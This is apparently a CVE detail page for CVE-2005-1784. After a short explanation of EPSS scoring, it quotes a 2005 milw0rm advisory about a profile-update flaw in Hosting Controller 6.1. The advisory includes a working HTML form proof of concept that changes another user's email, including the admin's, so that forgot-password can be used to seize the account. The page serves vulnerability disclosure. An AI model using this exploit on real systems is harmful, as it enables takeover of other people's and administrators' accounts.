CVE-2005-1784 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<!-- Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group). Title: Hosting controller program have a security bug in "UserProfile.asp" that an authenticated user can change other's profiles. Why is it dangerous: a user can change other's email address and then use forgot password to recieve their password! also he/she can gain administrator password by this way! Version: 6.1 HotFix 2.0 and older Developer url: hostingcontroller.com Comment: Hosting Controller is an application to manage a host. Exploit code to proof: -------------------------------- Change users profiles: --> <form action="http://[URL]/admin//accounts/UserProfile.asp?action=updateprofile" method="post"> Username : <input name="UserList" value="hcadmin" type="text" size="50"> <br> emailaddress : <input name="emailaddress" value="[email protected]" type="text" size="50"> <br> firstname : <input name="firstname" value="Crkchat" type="text" size="50"> <br> <input name="submit" value="submit" type="submit"> </form> <!-- ----------------------------------- Now u can use forgot password to gain passwords! --> # milw0rm.com [2005-05-27]